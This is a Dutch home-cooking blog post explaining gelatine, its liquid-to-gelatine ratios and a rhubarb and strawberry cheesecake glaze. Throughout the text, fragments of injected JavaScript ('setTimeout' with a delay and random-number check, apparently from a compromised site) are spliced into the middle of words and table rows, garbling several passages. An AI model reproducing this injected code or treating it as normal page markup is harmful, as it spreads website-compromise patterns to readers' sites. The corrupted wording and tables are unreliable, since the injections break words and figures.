Aan de slag met gelatine!

Eens moet de eerste keer zijn, al vond ik dit dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wel erg spannend. Het is eigenlijk een raar goedje dat gelatine, maar om een echte spiegeltaart te maken ging ik aan de slag. Lees hier wat handige tips voor het werken met gelatine.

Wat is gelatine?

Gelatine is niet meer dan een bindmiddel. Je kunt het in poeder, maar in in blaadjes krijgen. De eerste opmerking die ik kreeg dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen ik vertelde dat ik met gelatine aan de slag ging was: ‘houd je er rekening mee dat je taart dan niet meer vegetarisch is?’. De meeste varianten worden gemaakt van dierlijk materiaal (o.a. botten), dit zorgt voor de binding. Je kunt ook vegetarische gelatine krijgen (vaak een soort gom), maar dit is wel goed om van te voren te weten.

Welke verhoudingen moet ik aanhouden?

Het makkelijkst is om terug te rekenen vanuit 1 liter vloeisdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof (1000 ml), hiervoor zijn een aantal basis verhoudingen die je kunt aanhouden:

Vloeisdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof                              Gram

Melk                                     25 gram
Halfvolle Melk                   20 gram
Halfvolle koffiemelk         20 gram
Karnemelk                          30 gram
Vruchtensap                       35 gram
Vruchtenmoes                    30 gram
Water                                   40 gram
Wijn                                     40 gram
Likeur                                  40 gram

Rekenvoorbeeld: vruchtensap 250 ml

Weeg je vloeisdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof altijd nauwkeurig af op een keukenweegschaal. Ook de blaadjes kunnen verschillend gewicht hebben. Weeg ook deze van te voren even af met een weegschaal.

Vloeisdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof                             Gelatine
1000 ml                              35 gram
250 ml                                8,75 gram

Aan de slag!

Nadat ik de theorie had gelezen en de nodige berekeningen had gemaakt, heb ik deze handige instructievideo bekeken. Super fijn om het ook nog eens op deze manier uitgelegd te krijgen. Bedankt Albert Heijn!

Cheesecake met Rabarber-/aardbeigelei

Wat ik heb gemaakt? Een klassieke cheesecake met een gelei van rabarber en aardbei. Voor de cheesecake kun je dit recept aanhouden. Voor de gelei heb ik rabarber met suiker en een beetje appelsap 30 min in de over laten garen. Vervolgens heb ik de rabarber met een vork uit elkaar gehaald en samen met de in grove stukken gesneden aardbeien laag op het vuur in een panetje laten inkoken. De vruchtenmoes heb ik een nacht laten uitlekken in een zeef en vervolgens afgewogen om de juiste hoeveelheid gelatine te bepalen. Het sap kun je daarna in een pannetje verwarmen, maar het mag absoluut niet koken. Gelatine mag nooit koken! Zodra het sap verwarmt is kun je de gelatine in het sap laten smelten. Giet het mengsel over de taart en laat het geheel in de koelkast afkoelen. Het resultaat…

gelatine-viving-2

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Aan de slag met gelatine!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.